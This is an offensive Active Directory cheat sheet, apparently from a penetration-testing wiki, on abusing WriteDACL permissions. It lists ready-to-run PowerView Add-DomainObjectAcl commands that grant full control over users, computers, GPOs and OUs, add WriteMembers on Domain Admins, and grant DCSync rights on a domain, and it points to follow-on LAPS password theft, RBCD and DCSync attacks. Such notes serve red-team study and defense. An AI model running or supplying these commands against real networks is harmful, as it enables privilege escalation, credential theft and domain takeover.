WriteDACL

Information

With write access to the target object’s DACL, you can grant yourself any privilege you want on the object.

Exploitation

Over a Group

Grant yourself full control of the group -> Add members to the group (see here).

# Assigning the right 
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers

Over a User

Grant yourself full control of the user -> See here for exploitation options.

# Assigning GenericAll permissions over the user
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All

Over a Computer

Grant yourself full control of the computer -> read the LAPS password or perform RBCD against the target computer.

# Assigning GenericAll permissions over the computer
Add-DomainObjectAcl -TargetIdentity windows01 -Rights All

Then some options are

Over a Domain

Grant yourself DCSync rights -> perform a DCSync attack.

Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSync

Over GPOs

Grant yourself full control of the GPO -> edit the GPO to take over an object the GPO applies to.

Add-DomainObjectAcl -TargetIdentity TestGPO -Rights All

Over OUs

Grant yourself full control of the OU -> Add a new ACE to the OU that inherits down to child objects to take over those child objects.

Add-DomainObjectAcl -TargetIdentity (OU GUID) -Rights All